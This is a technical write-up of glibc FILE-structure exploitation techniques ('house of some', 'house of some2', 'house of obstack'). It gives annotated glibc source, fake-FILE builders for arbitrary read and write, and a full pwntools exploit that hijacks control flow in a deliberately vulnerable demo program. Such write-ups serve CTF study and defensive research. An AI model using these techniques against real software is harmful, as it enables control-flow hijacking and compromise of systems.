_IO_switch_to_get_mode (fp);

/* This is very tricky. We have to adjust those
pointers before we call _IO_SYSREAD () since
we may longjump () out while waiting for
input. Those pointers may be screwed up. H.J. */
fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
fp->_IO_read_end = fp->_IO_buf_base;
fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end
= fp->_IO_buf_base;

count = _IO_SYSREAD (fp, fp->_IO_buf_base,
fp->_IO_buf_end - fp->_IO_buf_base);
if (count <= 0)
{
if (count == 0)
fp->_flags |= _IO_EOF_SEEN;
else
fp->_flags |= _IO_ERR_SEEN, count = 0;
}
fp->_IO_read_end += count;
if (count == 0)
{
/* If a stream is read to EOF, the calling application may switch active
handles. As a result, our offset cache would no longer be valid, so
unset it. */
fp->_offset = _IO_pos_BAD;
return EOF;
}
if (fp->_offset != _IO_pos_BAD)
_IO_pos_adjust (fp->_offset, count);
return *(unsigned char *) fp->_IO_read_ptr;
}
It calls the macro _IO_SYSREAD (fp, fp->_IO_buf_base, fp->_IO_buf_end - fp->_IO_buf_base). The corresponding regular read function is:
ssize_t  
_IO_file_read (FILE *fp, void *buf, ssize_t size)
{
return (__builtin_expect (fp->_flags2 & _IO_FLAGS2_NOTCANCEL, 0)
? __read_nocancel (fp->_fileno, buf, size)
: __read (fp->_fileno, buf, size));
}
All three arguments of read are controllable:
  • fd => fp->_fileno
  • buf => fp->_IO_buf_base
  • size => fp->_IO_buf_end - fp->_IO_buf_base

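In the for loop of _IO_flush_all, the FILEs on _IO_list_all form a singly linked list threaded through _chain. _IO_flush_all walks every FILE on that list and calls _IO_OVERFLOW (fp, EOF) whenever the condition holds.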

_IO_new_file_underflow calls _IO_switch_to_get_mode, which contains this branch:

if (fp->_IO_write_ptr > fp->_IO_write_base)  
if (_IO_OVERFLOW (fp, EOF) == EOF)
return EOF;
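If fp->_IO_write_ptr > fp->_IO_write_base were still used to trigger OVERFLOW, this branch would fire again and recurse infinitely. That makes it unusable, so the other branch is needed instead:
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base) // not viable
|| (_IO_vtable_offset (fp) == 0 // take the branch after ||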
&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
> fp->_wide_data->_IO_write_base))
)
&& _IO_OVERFLOW (fp, EOF) == EOF)
Conditions for the arbitrary write (performed through read):
  • Set _flags to ~(2 | 0x8 | 0x800); 0 works (same as apple2)
  • Set vtable to _IO_wfile_jumps/_IO_wfile_jumps_mmap so that _IO_wfile_overflow gets called. Unlike apple2, no offset may be added to vtable here, otherwise the later _IO_SYSREAD call would be dispatched to the wrong slot
  • _wide_data->_IO_write_base = 0, i.e. *(_wide_data + 0x18) = 0 (same as apple2)
  • _wide_data->_IO_write_ptr > _wide_data->_IO_write_base, i.e. *(_wide_data + 0x20) > *(_wide_data + 0x18) (note: this differs from apple2)
  • _wide_data->_IO_buf_base = 0, i.e. *(_wide_data + 0x30) = 0 (same as apple2)
  • Set _wide_data->_wide_vtable to any table containing _IO_new_file_underflow. The stock vtable already has it, so _IO_file_jumps - 0x48 works
  • _vtable_offset = 0
  • Set _IO_buf_base and _IO_buf_end to the address range to be written
  • Set _chain to the address of the next fake file to trigger
  • _IO_write_ptr <= _IO_write_base
  • _fileno = 0, meaning read(0, buf, size)
  • _mode = 2; anything satisfying fp->_mode > 0 works
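These conditions can be sanity-checked with a small Python model. Fields are given as a dict with illustrative keys. `flush_all_triggers_overflow` mirrors the _IO_flush_all test quoted above. `switch_to_get_mode_recurses` captures the recursion problem. `some_read_args` returns the (fd, buf, size) triple that _IO_SYSREAD ends up with. All three function names are hypothetical.

```python
def flush_all_triggers_overflow(fp: dict) -> bool:
    """The _IO_flush_all condition quoted above."""
    narrow = fp["_mode"] <= 0 and fp["write_ptr"] > fp["write_base"]
    wide = (fp["_vtable_offset"] == 0 and fp["_mode"] > 0
            and fp["w_write_ptr"] > fp["w_write_base"])
    return narrow or wide


def switch_to_get_mode_recurses(fp: dict) -> bool:
    """_IO_switch_to_get_mode calls _IO_OVERFLOW again if the narrow write area is non-empty."""
    return fp["write_ptr"] > fp["write_base"]


def some_read_args(fp: dict):
    """(fd, buf, size) passed to read by _IO_SYSREAD in _IO_new_file_underflow."""
    return fp["_fileno"], fp["buf_base"], fp["buf_end"] - fp["buf_base"]
```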

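Arbitrary write

from pwn import context, flat

context.arch = "amd64"  # flat() packs integers with the context word size

def fake_file_read(write_start, write_end, wide_data_addr, next_fake_file, _IO_wfile_jumps):
    return flat({
        0x00: 0,                # _flags
        0x20: 0,                # _IO_write_base
        0x28: 0,                # _IO_write_ptr
        0x38: write_start,      # _IO_buf_base: start address of the write
        0x40: write_end,        # _IO_buf_end: end address of the write
        0x70: 0,                # _fileno: read from stdin
        0x82: b"\x00",          # _vtable_offset
        0xc0: 2,                # _mode
        0xa0: wide_data_addr,   # _wide_data
        0x68: next_fake_file,   # _chain: next fake file to trigger
        0xd8: _IO_wfile_jumps,  # vtable
    }, filler=b"\x00")

def fake_wide_data(_IO_file_jumps):
    return flat({
        0xe0: _IO_file_jumps - 0x48,  # _wide_vtable: doallocate slot (+0x68) hits _IO_new_file_underflow
        0x18: 0,                      # _IO_write_base
        0x20: 1,                      # _IO_write_ptr
        0x30: 0,                      # _IO_buf_base
    }, filler=b"\x00")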
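Arbitrary read
def fake_file_write(leak_start, leak_end, next_fake_file, _IO_file_jumps):
    return flat({
        0x00: 0x800 | 0x1000,   # _flags: _IO_CURRENTLY_PUTTING | _IO_IS_APPENDING
        0x20: leak_start,       # _IO_write_base: start address to leak
        0x28: leak_end,         # _IO_write_ptr: end address to leak
        0x70: 1,                # _fileno: stdout
        0x68: next_fake_file,   # _chain: next fake file to trigger
        0xd8: _IO_file_jumps,   # vtable
    }, filler=b"\x00")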

Attack flow

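  • Step 1: use the arbitrary write on a _chain. The target can be _IO_list_all or the _chain field of stdin, stdout or stderr. Lay out a fake_IO_file for arbitrary write in a controlled region, then write its address into one of those locations
  • Step 2: extend the fake_IO_file chain and leak a stack address. After step 1 there is only one fake_IO_file, which cannot do anything more complex. This step therefore writes two fake_IO_files: one leaks the value in environ (a stack address), the other writes the next fake_IO_file
  • Step 3: leak stack contents and find where the ROP chain should start. This step again writes two fake_IO_files: one uses the arbitrary read to read stack memory, the other uses the arbitrary write to put the ROP chain on the stack
  • Step 4: write the ROP chain and carry out the ROP attack on the stack!
[[./houseofsome1.png]]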

house of some2

The function of interest is _IO_wfile_underflow_maybe_mmap in _IO_wfile_jumps_maybe_mmap.

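Requirements:
  1. The libc address is known
  2. A controllable address (to write a fake file into)
  3. Control over the stdout pointer or the _IO_2_1_stdout_ structure
  4. The program uses an output function such as printf or puts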

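Advantages:
  1. Like House of Some, it bypasses the current vtable check
  2. printf and puts are ubiquitous, so it applies widely
  3. It can hijack control flow on the stack and hand over to House of Some to finish the attack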

First look at _IO_wfile_underflow_maybe_mmap:

wint_t  
_IO_wfile_underflow_maybe_mmap (FILE *fp)
{
/* This is the first read attempt. Doing the underflow will choose mmap
or vanilla operations and then punt to the chosen underflow routine.
Then we can punt to ours. */
if (_IO_file_underflow_maybe_mmap (fp) == EOF)
return WEOF;

return _IO_WUNDERFLOW (fp);
}
At the end it calls _IO_WUNDERFLOW through the vtable inside _wide_data. Next, look deeper into _IO_file_underflow_maybe_mmap:
int  
_IO_file_underflow_maybe_mmap (FILE *fp)
{
/* This is the first read attempt. Choose mmap or vanilla operations
and then punt to the chosen underflow routine. */
decide_maybe_mmap (fp);
return _IO_UNDERFLOW (fp);
}
At the end it calls _IO_UNDERFLOW through the FILE vtable. Next, look at decide_maybe_mmap:
static void  
decide_maybe_mmap (FILE *fp)
{
/* We use the file in read-only mode. This could mean we can
mmap the file and use it without any copying. But not all
file descriptors are for mmap-able objects and on 32-bit
machines we don't want to map files which are too large since
this would require too much virtual memory. */
struct __stat64_t64 st;

if (_IO_SYSSTAT (fp, &st) == 0
&& S_ISREG (st.st_mode) && st.st_size != 0
/* Limit the file size to 1MB for 32-bit machines. */
&& (sizeof (ptrdiff_t) > 4 || st.st_size < 1*1024*1024)
/* Sanity check. */
&& (fp->_offset == _IO_pos_BAD || fp->_offset <= st.st_size))
{
/* Try to map the file. */
void *p;
... (this part essentially just performs the mmap)
}

/* We couldn't use mmap, so revert to the vanilla file operations. */

if (fp->_mode <= 0)
_IO_JUMPS_FILE_plus (fp) = &_IO_file_jumps;
else
_IO_JUMPS_FILE_plus (fp) = &_IO_wfile_jumps;
fp->_wide_data->_wide_vtable = &_IO_wfile_jumps;
}
There is a key _IO_SYSSTAT call. In addition, the function restores the vtables of both the FILE and _wide_data at the end.

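Putting it together, a FILE that enters _IO_wfile_underflow_maybe_mmap goes through the following steps:
  1. _IO_SYSSTAT(fp, &st): a vtable call that receives a stack pointer
  2. decide_maybe_mmap returns, restoring both vtables
  3. _IO_UNDERFLOW (fp): a vtable call
  4. _IO_WUNDERFLOW (fp): a vtable call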

In the _IO_UNDERFLOW function of the _IO_file_jumps vtable, the step

count = _IO_SYSREAD (fp, fp->_IO_buf_base,  
fp->_IO_buf_end - fp->_IO_buf_base);
has all three arguments under our control, so it can write to an arbitrary address.

printf and puts eventually call the __xsputn entry of stdout's vtable. What if the __xsputn offset pointed directly at __underflow? That gives the following slot mapping:

__xsputn -> __underflow  
__stat -> __write
To get this, set stdout's vtable to _IO_wfile_jumps_maybe_mmap - 0x18.
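The slot arithmetic behind this shift can be checked in Python. This sketch assumes the standard x86-64 layout of struct _IO_jump_t: 21 eight-byte slots from __dummy to __imbue. `landed_slot` is a hypothetical helper. It reports which real slot a call hits when the vtable pointer is moved by `shift` bytes.

```python
# Slot names of struct _IO_jump_t in order; each slot is 8 bytes on x86-64.
SLOTS = ["dummy", "dummy2", "finish", "overflow", "underflow", "uflow",
         "pbackfail", "xsputn", "xsgetn", "seekoff", "seekpos", "setbuf",
         "sync", "doallocate", "read", "write", "seek", "close", "stat",
         "showmanyc", "imbue"]
OFF = {name: 8 * i for i, name in enumerate(SLOTS)}


def landed_slot(shift: int, called: str) -> str:
    """With vtable = real_table + shift, name the real slot hit by a call to `called`."""
    off = OFF[called] + shift
    if off % 8 or not 0 <= off < 8 * len(SLOTS):
        raise ValueError("call lands outside the real table")
    return SLOTS[off // 8]
```

For example, `landed_slot(-0x18, "xsputn")` gives `"underflow"` and `landed_slot(-0x18, "stat")` gives `"write"`. `landed_slot(-0x48, "doallocate")` gives `"underflow"`, which is the shift house of some uses for its wide vtable.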

In the call sequence above, _IO_SYSSTAT(fp, &st) then turns into write(fp, &st, ??). If rdx were controllable, this would leak stack data.

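The only part we control is the later _IO_UNDERFLOW (fp), where _IO_SYSREAD (fp, fp->_IO_buf_base, fp->_IO_buf_end - fp->_IO_buf_base) is controllable. Because decide_maybe_mmap forcibly restores the vtables, tampering with them has no side effects to worry about here.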

What happens if write(fp, &st, ??) runs with an uncontrolled rdx? It returns either 0 or non-zero. Go back to decide_maybe_mmap to see what follows.

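The check there works as follows. If _IO_SYSSTAT (fp, &st) returns non-zero, the if is skipped immediately. If it returns 0, the remaining conditions are evaluated. Look at the definition of S_ISREG: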

#define	__S_ISTYPE(mode, mask)	(((mode) & __S_IFMT) == (mask))  
#define S_ISREG(mode) __S_ISTYPE((mode), __S_IFREG)

The final test uses ==, so given what is typically on the stack it is unlikely to pass.

There is also the st.st_size != 0 check. Since stat did not actually run and the stack keeps its old contents, this if is unlikely to pass.

If that is still too likely, just make fp->_offset == _IO_pos_BAD || fp->_offset <= st.st_size false.

decide_maybe_mmap then completes without problems and leaves the forged fp completely unchanged.
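Here is the if-condition of decide_maybe_mmap on a 64-bit build, written as a Python predicate. This is a sketch: the constants are the usual Linux values of S_IFMT and S_IFREG, _IO_pos_BAD is taken as -1, and `takes_mmap_branch` is a hypothetical name.

```python
S_IFMT = 0o170000     # file type mask (Linux)
S_IFREG = 0o100000    # regular file
IO_POS_BAD = -1       # _IO_pos_BAD


def takes_mmap_branch(stat_ret: int, st_mode: int, st_size: int, offset: int) -> bool:
    """if-condition of decide_maybe_mmap; the 32-bit size limit is always true on 64-bit."""
    return (stat_ret == 0
            and (st_mode & S_IFMT) == S_IFREG      # S_ISREG
            and st_size != 0
            and (offset == IO_POS_BAD or offset <= st_size))
```

A non-zero return from the hijacked stat slot, or a large _offset, keeps execution out of the mmap branch. Execution then falls through to the code that restores the vtables.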

Next comes the _IO_UNDERFLOW of the _IO_file_jumps vtable, which performs the read.

Here we can set the following, where fake_file_start is the address of the fp we currently control:

_IO_buf_base = fake_file_start  
_IO_buf_end = fake_file_start + 0x1c8 // 0x1c8 also covers the wide_data area

This lets us rewrite the fake again and extend the controlled length, so wide_data becomes fully controllable too.

Back in the flow above, the next step is the vtable function _IO_WUNDERFLOW (fp).

However, the underflow above has just given us control of fp again, so this vtable function is also under our control.

We point it back: _IO_WUNDERFLOW(fp) -> _IO_wfile_underflow_maybe_mmap

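We are back at the starting point, but this time things are different. In the previous round we already gained control of rdx, because the third argument of _IO_SYSREAD (fp, fp->_IO_buf_base, fp->_IO_buf_end - fp->_IO_buf_base) is rdx = fp->_IO_buf_end - fp->_IO_buf_base.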

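At this point we still go through the same four steps:
  1. _IO_SYSSTAT(fp, &st): a vtable call that receives a stack pointer
  2. decide_maybe_mmap returns, restoring both vtables
  3. _IO_UNDERFLOW (fp): a vtable call
  4. _IO_WUNDERFLOW (fp): a vtable call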

The difference is that _IO_SYSSTAT(fp, &st) can now point at any vtable function, because the second takeover of fp overwrote the FILE vtable again.

We can therefore turn _IO_SYSSTAT(fp, &st) into _IO_new_file_read(fp, &st, rdx), which gives us a stack overflow.

Unfortunately, decide_maybe_mmap is built with a stack canary, so the overflow cannot be completed without first leaking the stack.

Because of how _fileno is set, write(1, stack, rdx) is not possible either. Is there really no way?

Enter _IO_default_xsputn and _IO_default_xsgetn.

Here is the source of these two functions:

size_t  
_IO_default_xsgetn (FILE *fp, void *data, size_t n)
{
size_t more = n;
char *s = (char*) data;
for (;;)
{
/* Data available. */
if (fp->_IO_read_ptr < fp->_IO_read_end)
{
size_t count = fp->_IO_read_end - fp->_IO_read_ptr;
if (count > more)
count = more;
if (count > 20)
{
s = __mempcpy (s, fp->_IO_read_ptr, count);
fp->_IO_read_ptr += count;
}
else if (count)
{
char *p = fp->_IO_read_ptr;
int i = (int) count;
while (--i >= 0)
*s++ = *p++;
fp->_IO_read_ptr = p;
}
more -= count;
}
if (more == 0 || __underflow (fp) == EOF)
break;
}
return n - more;
}


size_t
_IO_default_xsputn (FILE *f, const void *data, size_t n)
{
const char *s = (char *) data;
size_t more = n;
if (more <= 0)
return 0;
for (;;)
{
/* Space available. */
if (f->_IO_write_ptr < f->_IO_write_end)
{
size_t count = f->_IO_write_end - f->_IO_write_ptr;
if (count > more)
count = more;
if (count > 20)
{
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
s += count;
}
else if (count)
{
char *p = f->_IO_write_ptr;
ssize_t i;
for (i = count; --i >= 0; )
*p++ = *s++;
f->_IO_write_ptr = p;
}
more -= count;
}
if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)
break;
more--;
}
return n - more;
}

Both functions operate on the buffers inside fp. The two key parts are:

_IO_default_xsgetn (FILE *fp, void *data, size_t n)   
==> __mempcpy(data, fp->_IO_read_ptr, n);
_IO_default_xsputn (FILE *f, const void *data, size_t n)
==> __mempcpy (f->_IO_write_ptr, data, n);
As long as
fp->_IO_read_end - fp->_IO_read_ptr == n  
f->_IO_write_end - f->_IO_write_ptr == n
neither __underflow nor _IO_OVERFLOW is entered, which reduces interference from other functions.
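Here is a Python model of _IO_default_xsputn, restricted to the case above where the room in the buffer exactly matches n. It is a sketch: `mem` stands in for memory, and the pointer fields are indices into it. The function name and dict keys are made up.

```python
def default_xsputn(mem: bytearray, f: dict, data: bytes) -> int:
    """Model of _IO_default_xsputn: copy data to mem[f['write_ptr']:] while room remains.

    Raises RuntimeError where the real function would call _IO_OVERFLOW.
    """
    more = len(data)
    if more == 0:
        return 0
    s = 0
    if f["write_ptr"] < f["write_end"]:
        count = min(f["write_end"] - f["write_ptr"], more)
        # glibc uses __mempcpy for count > 20 and a byte loop otherwise; both copy the same bytes
        mem[f["write_ptr"]:f["write_ptr"] + count] = data[s:s + count]
        f["write_ptr"] += count
        s += count
        more -= count
    if more == 0:
        return len(data)
    raise RuntimeError("_IO_OVERFLOW would be called here")
```

_IO_default_xsgetn is symmetric: with _IO_read_end - _IO_read_ptr == n it copies from fp's buffer into `data` and never reaches __underflow.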

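This leads to a bold idea: copy the stack into a controlled region first, write at an offset there, and finally copy it back onto the stack. That bypasses the canary cleanly without ever leaking it.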
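Here is the copy, patch, copy-back idea reduced to plain Python byte buffers. In the exploit below, step 1 is _IO_default_xsputn (reached through the stat slot with &st), step 2 is the _IO_SYSREAD write, and step 3 is _IO_default_xsgetn. In this sketch they are ordinary slice copies. `patch_stack_via_copy`, the stack contents, the canary and the offsets are all invented for illustration.

```python
def patch_stack_via_copy(stack: bytearray, lo: int, hi: int,
                         scratch: bytearray, rel: int, payload: bytes) -> None:
    """Copy stack[lo:hi] into scratch, patch it at `rel`, then copy it back."""
    n = hi - lo
    scratch[:n] = stack[lo:hi]                     # 1: stack -> controlled buffer (xsputn)
    scratch[rel:rel + len(payload)] = payload      # 2: ordinary write into the copy (read)
    stack[lo:hi] = scratch[:n]                     # 3: controlled buffer -> stack (xsgetn)


stack = bytearray(b"\x00" * 0x18 + b"CANARY!!" + b"\x00" * 8 + b"RETADDR!" + b"\x00" * 8)
scratch = bytearray(0x100)
patch_stack_via_copy(stack, 0x10, 0x38, scratch, 0x28 - 0x10,
                     (0xdeadbeef).to_bytes(8, "little"))
```

The canary bytes are copied out and back unchanged, so the check on function return still passes even though the canary value was never known.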

[[./houseofsome2.png]]

demo.c

// gcc demo.c -o demo
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    setbuf(stdin, 0);
    setbuf(stdout, 0);
    setbuf(stderr, 0);
    int c;
    printf("[+] printf: %p\n", (void *)&printf);
    while (1) {
        puts("1. add heap.\n"
             "2. write libc.\n"
             "3. exit");
        printf("> ");
        scanf("%d", &c);
        if (c == 1) {
            int size;
            printf("size> ");
            scanf("%d", &size);
            char *p = malloc(size);
            printf("[+] done %p\n", p);
            printf("content> ");
            read(0, p, size);
        } else if (c == 2) {
            size_t addr, size;
            printf("size> ");
            scanf("%zu", &size);
            printf("addr> ");
            scanf("%zu", &addr);
            printf("content> ");
            read(0, (char *)addr, size);
        } else {
            break;
        }
    }
    return 0;
}

exp

from pwn import *  
context.log_level = 'debug'
context.arch = 'amd64'

tob = lambda x: str(x).encode()
io = process("./demo")

io.recvuntil(b"[+] printf: ")
printf_addr = int(io.recvuntil(b"\n", drop=True), 16)
log.success(f"printf_addr: {printf_addr:#x}")

def add(size):
    io.sendlineafter(b"> ", b"1")
    io.sendlineafter(b"size> ", tob(size))

def write(addr, size, content):
    io.sendlineafter(b"> ", b"2")
    io.sendlineafter(b"size> ", tob(size))
    io.sendlineafter(b"addr> ", tob(addr))
    io.sendafter(b"content> ", content)

def leave():
    io.sendlineafter(b"> ", b"3")

libc = ELF("./libc.so.6", checksec=False)
libc_base = printf_addr - libc.symbols["printf"]
libc.address = libc_base
log.success(f"libc_base: {libc_base:#x}")

_IO_wfile_jumps_maybe_mmap = libc.address + 0x215f40
log.success(f"_IO_wfile_jumps_maybe_mmap: {_IO_wfile_jumps_maybe_mmap:#x}")
_IO_str_jumps = libc.address + 0x2166c0
log.success(f"_IO_str_jumps: {_IO_str_jumps:#x}")
_IO_default_xsputn = _IO_str_jumps + 0x38
_IO_default_xsgetn = _IO_str_jumps + 0x40

# overwrite the contents of _IO_2_1_stdout_ directly
write(libc.symbols["_IO_2_1_stdout_"], 0xe0, flat({
0x0: 0x8000, # disable lock
0x38: libc.symbols["_IO_2_1_stdout_"], # _IO_buf_base
0x40: libc.symbols["_IO_2_1_stdout_"] + 0x1c8, # _IO_buf_end
0x70: 0, # _fileno
0xa0: libc.symbols["_IO_2_1_stdout_"] + 0x100, # _wide_data: only (this address + 0xe0) needs to be writable
0xc0: p32(0xffffffff), # _mode < 0
0xd8: _IO_wfile_jumps_maybe_mmap - 0x18,
}, filler=b"\x00"))

# copy stack data to a controlled address: here, just before _IO_2_1_stdout_, so that the next write also takes control of fp for the third time
io.send(flat({
0x8: libc.symbols["_IO_2_1_stdout_"], # must be a writable address

0x38: libc.symbols["_IO_2_1_stdout_"] - 0x1c8 + 0xc8, # _IO_buf_base
0x40: libc.symbols["_IO_2_1_stdout_"] + 0x1c8, # _IO_buf_end
0xa0: libc.symbols["_IO_2_1_stdout_"] + 0xe0,
0xc0: p32(0xffffffff),

0xd8: _IO_default_xsputn - 0x90, # vtable
0x28: libc.symbols["_IO_2_1_stdout_"] - 0x1c8, # _IO_write_ptr
0x30: libc.symbols["_IO_2_1_stdout_"], # _IO_write_end

0xe0: {
0xe0: _IO_wfile_jumps_maybe_mmap
}
}, filler=b"\x00"))

# finally, execution is hijacked to 0xdeadbeaf here
io.send(flat({
0: 0xdeadbeaf, # retn
0x1c8-0xc8: {
0x38: libc.symbols["_IO_2_1_stdout_"] - 0x1c8 + 0xc8, # _IO_buf_base
0x40: libc.symbols["_IO_2_1_stdout_"] + 0x1c8, # _IO_buf_end
0xa0: libc.symbols["_IO_2_1_stdout_"] + 0xe0,
0xc0: p32(0xffffffff),

0xd8: _IO_default_xsgetn - 0x90, # vtable
0x08: libc.symbols["_IO_2_1_stdout_"] - 0x1c8, # _IO_read_ptr
0x10: libc.symbols["_IO_2_1_stdout_"] + (0x1c8 - 0xc8), # _IO_read_end

0xe0: {
0xe0: _IO_wfile_jumps_maybe_mmap
}
}
}, filler=b"\x00"))

io.interactive()

house of 琴瑟琵琶 | house of obstack(2.34~2.36)

The _IO_obstack_file structure

struct _IO_obstack_file
{
struct _IO_FILE_plus file;
struct obstack *obstack;
};

struct obstack /* control current object in current chunk */
{
long chunk_size; /* preferred size to allocate chunks in */
struct _obstack_chunk *chunk; /* address of current struct obstack_chunk */
char *object_base; /* address of object we are building */
char *next_free; /* where to add next char to current object */
char *chunk_limit; /* address of char after current chunk */
union
{
PTR_INT_TYPE tempint;
void *tempptr;
} temp; /* Temporary for some macros. */
int alignment_mask; /* Mask of alignment for each object. */
/* These prototypes vary based on 'use_extra_arg', and we use
casts to the prototypeless function type in all assignments,
but having prototypes here quiets -Wstrict-prototypes. */
struct _obstack_chunk *(*chunkfun) (void *, long);
void (*freefun) (void *, struct _obstack_chunk *);
void *extra_arg; /* first arg for chunk alloc/dealloc funcs */
unsigned use_extra_arg : 1; /* chunk alloc/dealloc funcs take extra arg */
unsigned maybe_empty_object : 1; /* There is a possibility that the current
chunk contains a zero-length object. This
prevents freeing the chunk if we allocate
a bigger chunk to replace it. */
unsigned alloc_failed : 1; /* No longer used, as we now call the failed
handler on error, but retained for binary
compatibility. */
};
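To see where each member lands when this structure is forged in memory, the layout can be reproduced with ctypes. This is a minimal sketch assuming x86_64 (LP64) alignment; the `temp` union (PTR_INT_TYPE / void *) is modeled as one 8-byte slot, and the class name `Obstack` is only illustrative.

```python
import ctypes


class Obstack(ctypes.Structure):
    """Mirror of struct obstack, assuming x86_64 (LP64) natural alignment."""
    _fields_ = [
        ("chunk_size", ctypes.c_long),
        ("chunk", ctypes.c_void_p),
        ("object_base", ctypes.c_void_p),
        ("next_free", ctypes.c_void_p),
        ("chunk_limit", ctypes.c_void_p),
        ("temp", ctypes.c_void_p),          # union { PTR_INT_TYPE; void * }
        ("alignment_mask", ctypes.c_int),   # followed by 4 bytes of padding
        ("chunkfun", ctypes.c_void_p),
        ("freefun", ctypes.c_void_p),
        ("extra_arg", ctypes.c_void_p),
        ("use_extra_arg", ctypes.c_uint, 1),
        ("maybe_empty_object", ctypes.c_uint, 1),
        ("alloc_failed", ctypes.c_uint, 1),
    ]


# Byte offset of every member (bit-fields report their storage unit).
OFFSETS = {field[0]: getattr(Obstack, field[0]).offset for field in Obstack._fields_}

if __name__ == "__main__":
    for name, off in OFFSETS.items():
        print(f"{name:<20}{off:#x}")
```

With obstack_ptr = fake_io_addr + 0x30 and the payload written at fake_io_addr + 0x10 (the chunk header is skipped), chunkfun lands at payload offset 0x30 + 0x38 - 0x10 = 0x58, extra_arg at 0x68 and use_extra_arg at 0x70, which matches the exp later in this section.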

_IO_obstack_overflow

  • Call chain
  1. _IO_obstack_overflow

    static int _IO_obstack_overflow (FILE *fp, int c)
    {
    struct obstack *obstack = ((struct _IO_obstack_file *) fp)->obstack;
    int size;

    /* Make room for another character. This might as well allocate a
    new chunk a memory and moves the old contents over. */
    assert (c != EOF); // c cannot be controlled here
    obstack_1grow (obstack, c);

    /* Setup the buffer pointers again. */
    fp->_IO_write_base = obstack_base (obstack);
    fp->_IO_write_ptr = obstack_next_free (obstack);
    size = obstack_room (obstack);
    fp->_IO_write_end = fp->_IO_write_ptr + size;
    /* Now allocate the rest of the current chunk. */
    obstack_blank_fast (obstack, size);

    return c;
    }

  2. obstack_1grow (obstack, c)

  3. _obstack_newchunk (__o, 1)

  4. new_chunk = CALL_CHUNKFUN (h, new_size)

  5. (*(h)->chunkfun)((h)->extra_arg, (size))

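_IO_obstack_xsputn (preferred: FSOP reaches the overflow slot with c == EOF, which the assert in _IO_obstack_overflow rejects)

  • Call chain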
  1. _IO_obstack_xsputn

    static size_t _IO_obstack_xsputn (FILE *fp, const void *data, size_t n)
    {
    struct obstack *obstack = ((struct _IO_obstack_file *) fp)->obstack;

    if (fp->_IO_write_ptr + n > fp->_IO_write_end)
    {
    int size;

    /* We need some more memory. First shrink the buffer to the
    space we really currently need. */
    obstack_blank_fast (obstack, fp->_IO_write_ptr - fp->_IO_write_end);

    /* Now grow for N bytes, and put the data there. */
    obstack_grow (obstack, data, n); // the call we want to reach

    /* Setup the buffer pointers again. */
    fp->_IO_write_base = obstack_base (obstack);
    fp->_IO_write_ptr = obstack_next_free (obstack);
    size = obstack_room (obstack);
    fp->_IO_write_end = fp->_IO_write_ptr + size;
    /* Now allocate the rest of the current chunk. */
    obstack_blank_fast (obstack, size);
    }
    else
    fp->_IO_write_ptr = __mempcpy (fp->_IO_write_ptr, data, n);

    return n;
    }

  2. obstack_grow (obstack, data, n)

            obstack_grow(obstack, data, n);
    Definition:
    # define obstack_grow(OBSTACK, where, length) \
    __extension__ \
    ({ struct obstack *__o = (OBSTACK); \
    int __len = (length); \
    if (__o->next_free + __len > __o->chunk_limit) \
    _obstack_newchunk (__o, __len); \
    memcpy (__o->next_free, where, __len); \
    __o->next_free += __len; \
    (void) 0; })
    After substitution:
    ({
    struct obstack *__o = (obstack);
    int __len = (n);
    if (__o->next_free + __len > __o->chunk_limit)_obstack_newchunk(__o, __len);
    memcpy(__o->next_free, data, __len);
    __o->next_free += __len;
    (void) 0;
    });

  3. _obstack_newchunk (__o, __len)

    void _obstack_newchunk(struct obstack *h, int length) {
    struct _obstack_chunk *old_chunk = h->chunk;
    struct _obstack_chunk *new_chunk;
    long new_size;
    long obj_size = h->next_free - h->object_base;
    long i;
    long already;
    char *object_base;

    /* Compute size for new chunk. */
    new_size = (obj_size + length) + (obj_size >> 3) + h->alignment_mask + 100;
    if (new_size < h->chunk_size)
    new_size = h->chunk_size;

    /* Allocate and initialize the new chunk. */
    new_chunk = CALL_CHUNKFUN(h, new_size); // the call that gets hijacked
    ...
    }

  4. new_chunk = CALL_CHUNKFUN (h, new_size)

    new_chunk = CALL_CHUNKFUN(h, new_size);
    Definition:
    #define CALL_CHUNKFUN(h, size) \
    (((h)->use_extra_arg) \
    ? (*(h)->chunkfun)((h)->extra_arg, (size)) \
    : (*(struct _obstack_chunk * (*) (long) )(h)->chunkfun)((size)))
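    After substitution:
    (((h)->use_extra_arg) ? (*(h)->chunkfun)((h)->extra_arg, (new_size)) : (*(struct _obstack_chunk *(*) (long) )(h)->chunkfun)((new_size)))
    The first argument ((h)->extra_arg) is controllable; (h)->use_extra_arg must be non-zero (i.e. 1) so that this two-argument form is taken.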

  5. (*(h)->chunkfun)((h)->extra_arg, (size))
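The chain can be modeled in a few lines of Python to see which fields decide the outcome. A rough sketch: the dicts stand in for the forged FILE and struct obstack, only the fields on this path are modeled, and the function names are hypothetical. It also shows that the first argument is simply whatever extra_arg holds, while new_size (the second argument) is derived from the other fields.

```python
def call_chunkfun(h, size):
    """CALL_CHUNKFUN: two-argument form only when use_extra_arg is set."""
    if h["use_extra_arg"]:
        return h["chunkfun"](h["extra_arg"], size)
    return h["chunkfun"](size)


def obstack_newchunk(h, length):
    """Size computation of _obstack_newchunk, up to the allocation call."""
    obj_size = h["next_free"] - h["object_base"]
    new_size = (obj_size + length) + (obj_size >> 3) + h["alignment_mask"] + 100
    if new_size < h["chunk_size"]:
        new_size = h["chunk_size"]
    return call_chunkfun(h, new_size)


def obstack_xsputn(fp, h, n):
    """Slow path of _IO_obstack_xsputn; returns chunkfun's result or None."""
    if fp["_IO_write_ptr"] + n <= fp["_IO_write_end"]:
        return None  # fast path: plain __mempcpy, nothing hijacked
    # obstack_blank_fast(obstack, _IO_write_ptr - _IO_write_end)
    h["next_free"] += fp["_IO_write_ptr"] - fp["_IO_write_end"]
    # obstack_grow: request a new chunk when the data does not fit
    if h["next_free"] + n > h["chunk_limit"]:
        return obstack_newchunk(h, n)
    return None


def demo():
    """Hypothetical forged values; chunkfun just records its arguments."""
    calls = []
    h = {"chunk_size": 0, "object_base": 0, "next_free": 0, "chunk_limit": 0,
         "alignment_mask": 0, "use_extra_arg": 1, "extra_arg": 0xdead,
         "chunkfun": lambda arg, size: calls.append((arg, size))}
    obstack_xsputn({"_IO_write_ptr": 0x100, "_IO_write_end": 0}, h, 8)
    return calls
```

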